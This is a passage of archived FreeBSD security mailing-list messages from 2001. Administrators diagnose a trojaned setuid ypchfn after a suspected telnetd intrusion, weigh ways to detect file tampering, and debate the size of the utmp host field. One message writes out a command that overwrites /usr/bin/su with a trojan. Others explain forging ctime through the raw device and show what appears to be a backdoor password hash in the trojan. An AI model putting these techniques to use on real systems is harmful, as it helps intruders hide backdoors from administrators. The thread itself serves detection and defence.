<20010724205228.A16243@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="SLDf9lqlvOQaIe6s" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724205228.A16243@ringworld.oblivion.bg> X-PGP-Key: http://www.smithurst.org/ben/pgp-key.txt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --SLDf9lqlvOQaIe6s Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Peter Pentchev wrote: > ypchfn changed its inode number, and its link count. This means that > somebody performed an unlink() (delete) on ypchfn, and then created > a new ypchfn with the same size, timestamp, permissions and stuff, > but still a new file - and that's where the hardlink count + inum > tracking of /etc/security kicked in and alerted you. hmm, so if an intruder replaced a file without changing it's link count, size, or modification time, I wouldn't be alerted? Perhaps we should change the security script to print the files ctime instead of mtime, since the ctime can't be forged? --=20 Ben Smithurst / ben@FreeBSD.org FreeBSD: The Power To Serve http://www.FreeBSD.org/ --SLDf9lqlvOQaIe6s Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XbkPbPzJ+yzvRCwRAkPYAKDIMXvUljV8w/cDAB55KEXxchrvjACfZfAH pvJtofLsTwLr+Zsmpq3Nges= =YIY0 -----END PGP SIGNATURE----- --SLDf9lqlvOQaIe6s-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11:12:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from catfood.nt.phred.org (fw.phred.org [216.39.149.188]) by hub.freebsd.org (Postfix) with ESMTP id 67FD537B405; Tue, 24 Jul 2001 11:12:29 -0700 (PDT) (envelope-from alex@phred.org) Received: from phred.org ([216.39.149.189]) by catfood.nt.phred.org with Microsoft SMTPSVC(5.0.2195.3779); Tue, 24 Jul 2001 11:09:40 -0700 Date: Tue, 24 Jul 2001 11:11:17 -0700 (PDT) From: alex wetmore To: Ben Smithurst Cc: Peter Pentchev , Jon Loeliger , Subject: Re: Security Check Diffs Question In-Reply-To: <20010724190607.F20105@strontium.shef.vinosystems.com> Message-ID: <20010724110942.L32042-100000@phred.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-OriginalArrivalTime: 24 Jul 2001 18:09:40.0703 (UTC) FILETIME=[CED24EF0:01C1146B] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 24 Jul 2001, Ben Smithurst wrote: > Peter Pentchev wrote: > > ypchfn changed its inode number, and its link count. This means that > > somebody performed an unlink() (delete) on ypchfn, and then created > > a new ypchfn with the same size, timestamp, permissions and stuff, > > but still a new file - and that's where the hardlink count + inum > > tracking of /etc/security kicked in and alerted you. > > hmm, so if an intruder replaced a file without changing it's link count, > size, or modification time, I wouldn't be alerted? Perhaps we should > change the security script to print the files ctime instead of mtime, > since the ctime can't be forged? Or keep md5 signatures around... Jon: Did you patch the telnet hole? alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11:23:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 4089437B407 for ; Tue, 24 Jul 2001 11:23:30 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15P6q8-000Gd7-00; Tue, 24 Jul 2001 19:23:28 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f6OINRu78977; Tue, 24 Jul 2001 19:23:27 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Tue, 24 Jul 2001 19:23:27 +0100 From: Ben Smithurst To: alex wetmore Cc: Peter Pentchev , Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724192327.G20105@strontium.shef.vinosystems.com> References: <20010724190607.F20105@strontium.shef.vinosystems.com> <20010724110942.L32042-100000@phred.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IrhDeMKUP4DT/M7F" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724110942.L32042-100000@phred.org> X-PGP-Key: http://www.smithurst.org/ben/pgp-key.txt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --IrhDeMKUP4DT/M7F Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable alex wetmore wrote: >> hmm, so if an intruder replaced a file without changing it's link count, >> size, or modification time, I wouldn't be alerted? Perhaps we should >> change the security script to print the files ctime instead of mtime, >> since the ctime can't be forged? >=20 > Or keep md5 signatures around... well, yes, but that requires more than a single character change to /etc/security. :-) --=20 Ben Smithurst / ben@FreeBSD.org FreeBSD: The Power To Serve http://www.FreeBSD.org/ --IrhDeMKUP4DT/M7F Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Xb0ebPzJ+yzvRCwRAjbxAKDKVH09rpYc85kvQtlXdBk0nYTKHwCcCcDA VYQdU61kajpaiZam4CmisL0= =Kzt9 -----END PGP SIGNATURE----- --IrhDeMKUP4DT/M7F-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11:25:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 6D36437B405 for ; Tue, 24 Jul 2001 11:25:40 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 19568 invoked by uid 1000); 24 Jul 2001 18:24:44 -0000 Date: Tue, 24 Jul 2001 21:24:44 +0300 From: Peter Pentchev To: Ben Smithurst Cc: Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724212444.A19217@ringworld.oblivion.bg> Mail-Followup-To: Ben Smithurst , Jon Loeliger , security@freebsd.org References: <200107241632.LAA05639@chrome.jdl.com> <20010724205228.A16243@ringworld.oblivion.bg> <20010724190607.F20105@strontium.shef.vinosystems.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724190607.F20105@strontium.shef.vinosystems.com>; from ben@FreeBSD.org on Tue, Jul 24, 2001 at 07:06:07PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 24, 2001 at 07:06:07PM +0100, Ben Smithurst wrote: > Peter Pentchev wrote: > > > ypchfn changed its inode number, and its link count. This means that > > somebody performed an unlink() (delete) on ypchfn, and then created > > a new ypchfn with the same size, timestamp, permissions and stuff, > > but still a new file - and that's where the hardlink count + inum > > tracking of /etc/security kicked in and alerted you. > > hmm, so if an intruder replaced a file without changing it's link count, > size, or modification time, I wouldn't be alerted? Perhaps we should > change the security script to print the files ctime instead of mtime, > since the ctime can't be forged? 'Replacing' would not be enough - removing the file or moving something over it (the way install(1) does) would change its inode number. It is trivial to replace a file without changing its inode number, but fortunately, almost none of the ready-made toolkits do that, and very few crackers know that they should watch out for this, too. The ctime, too, can be changed, but that would require modifying the inode contents by writing to the raw device. Again, not something most crackers (and any script kiddies) know how to do. G'luck, Peter -- No language can express every thought unambiguously, least of all this one. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11:33:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id ADAF537B403 for ; Tue, 24 Jul 2001 11:33:41 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15P6zz-000MuP-00; Tue, 24 Jul 2001 19:33:39 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f6OIXdW04179; Tue, 24 Jul 2001 19:33:39 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Tue, 24 Jul 2001 19:33:39 +0100 From: Ben Smithurst To: Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724193339.H20105@strontium.shef.vinosystems.com> References: <200107241632.LAA05639@chrome.jdl.com> <20010724205228.A16243@ringworld.oblivion.bg> <20010724190607.F20105@strontium.shef.vinosystems.com> <20010724212444.A19217@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="gr/z0/N6AeWAPJVB" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724212444.A19217@ringworld.oblivion.bg> X-PGP-Key: http://www.smithurst.org/ben/pgp-key.txt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --gr/z0/N6AeWAPJVB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Peter Pentchev wrote: > 'Replacing' would not be enough - removing the file or moving something > over it (the way install(1) does) would change its inode number. I meant if they did something like cat my_trojan > /usr/bin/su or whatever, which wouldn't change the inode number... But... > The ctime, too, can be changed, =2E.. Never mind then. :-( Maybe /etc/security should be updated to do stuff with mtree's md5/sha1 digest stuff... --=20 Ben Smithurst / ben@FreeBSD.org FreeBSD: The Power To Serve http://www.FreeBSD.org/ --gr/z0/N6AeWAPJVB Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Xb+CbPzJ+yzvRCwRArAIAJwIuy80YiSSB96cNnM59MKSDFbIMQCfWbHB N1N++Upsz+rsXHXEXsKReFU= =bIV0 -----END PGP SIGNATURE----- --gr/z0/N6AeWAPJVB-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 12:24:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.22.40]) by hub.freebsd.org (Postfix) with ESMTP id 2059037B407; Tue, 24 Jul 2001 12:24:30 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.11.3/8.11.3) with ESMTP id f6OJNfs73486; Tue, 24 Jul 2001 15:23:41 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200107231559.f6NFxng17095@earth.backplane.com> References: <200107231012.f6NACgg60192@hak.lan.Awfulhak.org> <200107231559.f6NFxng17095@earth.backplane.com> Date: Tue, 24 Jul 2001 15:23:38 -0400 To: Matt Dillon , Brian Somers From: Garance A Drosihn Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip Cc: "Jeroen Massar" , "'Brian Somers'" , "'Hajimu UMEMOTO'" , aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 8:59 AM -0700 7/23/01, Matt Dillon wrote: >: >: Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only >: put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0). >: >: Any disagreements ? Should this be brought up (explained) on -arch >: now ? > > Make it 56, and you've got to put the whole IP address in the > field, not the short form. Logs are often processed off-host > and the short form wouldn't be useful. And we have to worry > about X at some point. 40 isn't quite big enough. If we are going to go thru the pain of changing it at all, then we should change it to be big enough to be worthwhile. 56 sounds like a good number to me, or perhaps even a little big larger. Just a LITTLE bit larger though -- the 256 of openbsd sounds like overkill, IMO. I do think it's time to bring this up on -arch. I will do that. -- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 12:24:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.22.40]) by hub.freebsd.org (Postfix) with ESMTP id E7B4137B409; Tue, 24 Jul 2001 12:24:31 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.11.3/8.11.3) with ESMTP id f6OJOSs111282; Tue, 24 Jul 2001 15:24:28 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200107231707.f6NH7wU18016@earth.backplane.com> References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> <200107231557.f6NFvQb17025@earth.backplane.com> <200107231649.f6NGnq982448@khavrinen.lcs.mit.edu> <200107231707.f6NH7wU18016@earth.backplane.com> Date: Tue, 24 Jul 2001 15:24:23 -0400 To: Matt Dillon , arch@FreeBSD.ORG From: Garance A Drosihn Subject: Changes to utmp, wtmp & lastlog entries Cc: Garrett Wollman , brian@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a spin-off of the thread in -security about: bin/22595: telnetd tricked into using arbitrary peer ip I figured we might as well bring it up in -arch at this point. The question is what (if any) changes should we make to the way entries are made to utmp, wtmp, and lastlog. If you look at that PR, there are some security implications wrt how those entries are currently handled, and thus it would be a good idea to do something about them. I'm quoting some of the recent background here, but you'd want to check that PR (and all the followup entries to it) for full details: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=22595 At 10:07 AM -0700 7/23/01, Matt Dillon wrote: >Garrett Wollman wrote: >:<:> Garrett Wollman wrote: >:> : SVR4 has an API. This API is standardized as a part of >:> : the Austin Group process. >: >:> Fine.. then if you want to get all the third party program >:> authors to use a magic API, be my guest. >: >: If they run on Solaris -- which most of them do -- then they already >: do. Nice try, Matt, but far off the mark. >: >:-GAWollman > > Really.. Lets see. wu-ftpd... nope. proftpd... nope. Want me > to continue? Still... If there *is* an API which would be common to both Solaris and FreeBSD, then it should be much easier to get third-party program authors to accept changes to use that API. As for the best change to make, let me suggest that we basically follow both Matt's and Garrett's recommendations (which were made in other messages in the thread). Let's increase the size of UT_HOSTSIZE to at least 56, so the field can always hold the complete IP address (even for IPv6) in the field, but let's encourage programs to use whatever the standardized API is to make these entries. There will be a bit of a transition-hit when the size of the field is changed, where anything that usees or sets these records will need to be recompiled. Maybe we should do this change as part of 5.0, and not MFC it. If you read all the entries in the PR, Brian noted that OpenBSD has already changed UT_HOSTSIZE to be 256. I might go for something larger than 56 (such as 64, just to be a computer geek who always picks powers of 2...), but I don't think freebsd needs to go all the way to 256. I don't feel too strongly about the actual solution decided upon, but I did think it was about time to have this topic explicitly mentioned in freebsd-arch, so we can figure out what is best to do and then do whatever that is. -- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 15:42:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 6647337B401 for ; Tue, 24 Jul 2001 15:42:31 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9464866E04; Tue, 24 Jul 2001 15:42:29 -0700 (PDT) Date: Tue, 24 Jul 2001 15:42:29 -0700 From: Kris Kennaway To: Wade Majors Cc: security@freebsd.org Subject: Re: telnetd remote root exploit released Message-ID: <20010724154228.A36368@xor.obsecurity.org> References: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="n8g4imXOkfNTN/H1" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from wade@ezri.org on Tue, Jul 24, 2001 at 12:54:26PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --n8g4imXOkfNTN/H1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jul 24, 2001 at 12:54:26PM -0400, Wade Majors wrote: > This is the same one we are all patched against now, right? If you applied the patch from the advisory, not the one floating around on this list last week, yes. Kris --n8g4imXOkfNTN/H1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XfnUWry0BWjoQKURAloTAJ93lJxr9dspo0M+mLXpGWw0+vvFTwCdGaSN k0a6xhxfjXRrRiKgZ19QaEM= =AEG5 -----END PGP SIGNATURE----- --n8g4imXOkfNTN/H1-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 15:47:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id CE90137B408 for ; Tue, 24 Jul 2001 15:47:12 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EF91A66E04; Tue, 24 Jul 2001 15:47:11 -0700 (PDT) Date: Tue, 24 Jul 2001 15:47:11 -0700 From: Kris Kennaway To: Peter Pentchev Cc: Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724154711.B36368@xor.obsecurity.org> References: <200107241632.LAA05639@chrome.jdl.com> <20010724205228.A16243@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dc+cDN39EJAMEtIO" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724205228.A16243@ringworld.oblivion.bg>; from roam@orbitel.bg on Tue, Jul 24, 2001 at 08:52:28PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --dc+cDN39EJAMEtIO Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 24, 2001 at 08:52:28PM +0300, Peter Pentchev wrote: > On Tue, Jul 24, 2001 at 11:32:23AM -0500, Jon Loeliger wrote: > > Hi Folks, > >=20 > > This morning, on a machine that's been up for 33 days, > > I suddenly saw these /etc/security diffs: > >=20 > > setuid diffs: > > 20,22c20,22 > > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/c= hfn > > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/c= hpass > > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/c= hsh > > --- > > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/c= hfn > > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/c= hpass > > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/c= hsh >=20 > This means that there were 6 files hardlinked to inode 8047, now there are > only five. One of the links was removed and probably replaced with somet= hing > else, which cannot point to the same inode. >=20 > > 53,55c53,55 > > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/y= pchfn > > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/y= pchpass > > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/y= pchsh > > --- > > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/y= pchfn > > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/y= pchpass > > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/y= pchsh >=20 > ypchfn changed its inode number, and its link count. This means that > somebody performed an unlink() (delete) on ypchfn, and then created > a new ypchfn with the same size, timestamp, permissions and stuff, > but still a new file - and that's where the hardlink count + inum > tracking of /etc/security kicked in and alerted you. This is a signature I've seen before; chances are someone has gained root on your machine (probably through telnetd) Kris --dc+cDN39EJAMEtIO Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XfrvWry0BWjoQKURAvJeAKDsCZkpIj6+SPgDlJKLcZcHHXsGQQCfc7uh mPBrUpzcRNEQq2OkAA9sHhg= =jAzX -----END PGP SIGNATURE----- --dc+cDN39EJAMEtIO-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 16:19:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from oksala.org (modemcable048.156-201-24.mtl.mc.videotron.ca [24.201.156.48]) by hub.freebsd.org (Postfix) with ESMTP id D63F137B407 for ; Tue, 24 Jul 2001 16:19:48 -0700 (PDT) (envelope-from silence@oksala.org) Received: from oksala.org (silence@silence [24.201.156.48]) by oksala.org (8.11.4/8.11.1) with ESMTP id f6ONGH377325 for ; Tue, 24 Jul 2001 19:16:18 -0400 (EDT) (envelope-from silence@oksala.org) Message-ID: <3B5E01C0.4234B000@oksala.org> Date: Tue, 24 Jul 2001 19:16:16 -0400 From: Pierre-Luc =?iso-8859-1?Q?Lesp=E9rance?= X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.3-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Re: Security Check Diffs Question References: <200107241632.LAA05639@chrome.jdl.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jon Loeliger wrote: > > Hi Folks, > > This morning, on a machine that's been up for 33 days, > I suddenly saw these /etc/security diffs: > > setuid diffs: > 20,22c20,22 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > --- > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > 53,55c53,55 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > --- > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh If your box is not really* important. You sould lets it like that and wait for the return of the Evil telnetd cracker (if any) and mail a little paper to is ISP. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 16:41:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from cdrrdslgw2poolA156.cdrr.uswest.net (cdrrdslgw2poole180.cdrr.uswest.net [63.228.165.180]) by hub.freebsd.org (Postfix) with ESMTP id 9B1A437B406; Tue, 24 Jul 2001 16:41:54 -0700 (PDT) (envelope-from dean@cdrrdslgw2poolA156.cdrr.uswest.net) Received: (from dean@localhost) by cdrrdslgw2poolA156.cdrr.uswest.net (8.11.4/8.11.2) id f6ONfpi99078; Tue, 24 Jul 2001 18:41:52 -0500 (CDT) (envelope-from dean) Date: Tue, 24 Jul 2001 18:41:52 -0500 (CDT) From: "Dean M. Phillips" Message-Id: <200107242341.f6ONfpi99078@cdrrdslgw2poolA156.cdrr.uswest.net> To: ben@FreeBSD.org Cc: jdl@jdl.com, security@FreeBSD.org In-reply-to: <20010724193339.H20105@strontium.shef.vinosystems.com> (ben@FreeBSD.org) Subject: Re: Security Check Diffs Question Reply-To: deanmphillips@uswest.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For mission-critical servers, I prefer to use tripwire. Burn the binary and the database onto a CDROM and it will be nearly tamper-proof. Oh yes, the default config file needs to be updated, but you really ought to customize it anyway. -- Dean M. Phillips deanmphillips@uswest.net Office: 319-295-0407 Home: 319-373-9825 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 16:47:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 091F937B401 for ; Tue, 24 Jul 2001 16:47:45 -0700 (PDT) (envelope-from kzaraska@student.uci.agh.edu.pl) Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id 3A3391C67; Wed, 25 Jul 2001 01:47:26 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id E74835475; Wed, 25 Jul 2001 01:47:25 +0200 (CEST) Date: Wed, 25 Jul 2001 01:47:25 +0200 (CEST) From: Krzysztof Zaraska X-Sender: kzaraska@lhotse.zaraska.dhs.org To: Peter Pentchev Cc: Jon Loeliger , security@FreeBSD.ORG Subject: Re: Security Check Diffs Question In-Reply-To: <20010724205228.A16243@ringworld.oblivion.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 24 Jul 2001, Peter Pentchev wrote: > > Here is a `strings /usr/bin/ypchfn`: > > > > www 182 # strings /usr/bin/ypchfn > > /usr/libexec/ld-elf.so.1 > > FreeBSD > > libcrypt.so.2 > > _DYNAMIC > > _init > > __deregister_frame_info > > crypt > > strcmp > > _fini > > _GLOBAL_OFFSET_TABLE_ > > __register_frame_info > > libc.so.4 > > strerror > > execl > > environ > > fprintf > > __progname > > __error > > setgid > > __sF > > execv > > getpwuid > > getpwnam > > atexit > > exit > > strchr > > execvp > > setuid > > _etext > > _edata > > __bss_start > > _end > > 8/u > > QR2cc.wsLFbKU > > root > > ..and just as somebody else pointed out, the last two lines look like > a 13-character DES-encrypted password hash and a username. I think > that the 'new' ypchfn either replaces root's password, or asks for > a password and gives a root shell if the user enters the password > corresponding to that hash. Please correct me if I'm wrong, but... Driven by curiousity I've just done strings /usr/bin/ypchfn on my 4.3-RELEASE machine and got the output which is 346 lines long. So it seems to me that this binary is not a 